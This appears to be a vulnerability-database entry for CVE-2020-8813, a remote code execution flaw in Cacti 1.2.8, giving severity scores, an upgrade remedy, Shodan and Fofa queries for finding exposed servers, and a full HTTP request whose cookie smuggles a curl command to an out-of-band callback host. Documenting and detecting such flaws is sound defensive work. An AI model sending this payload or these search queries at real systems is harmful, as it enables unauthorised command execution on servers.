| Title | Cacti v1.2.8 - Remote Code Execution |
|---|---|
| Author | gy741 |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. |
| Remediation | Upgrade to a patched version of Cacti v1.2.9 or later to mitigate this vulnerability. |
| CVSS Score | 8.8 |
| EPSS Score | 0.94078 |
| CVE ID | CVE-2020-8813 |
| CWE ID | CWE-78 |
| Shodan Query | http.title:"login to cacti"http.title:"cacti"http.favicon.hash:"-1797138069" |
| Fofa Query | icon_hash="-1797138069"title="cacti"title="login to cacti" |
| Tags | cve2020 cve cacti rce oast vkev vuln |
Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if “Guest Realtime Graphs” privileges are enabled.
GET /graph_realtime.php?action=init HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0
Connection: close
Cookie: Cacti=%3Bcurl%20http%3A//d5jp3ople0o4mj701f50cpcp3e65n68sf.oast.site
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-8813.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-8813.pcap
N/AN/A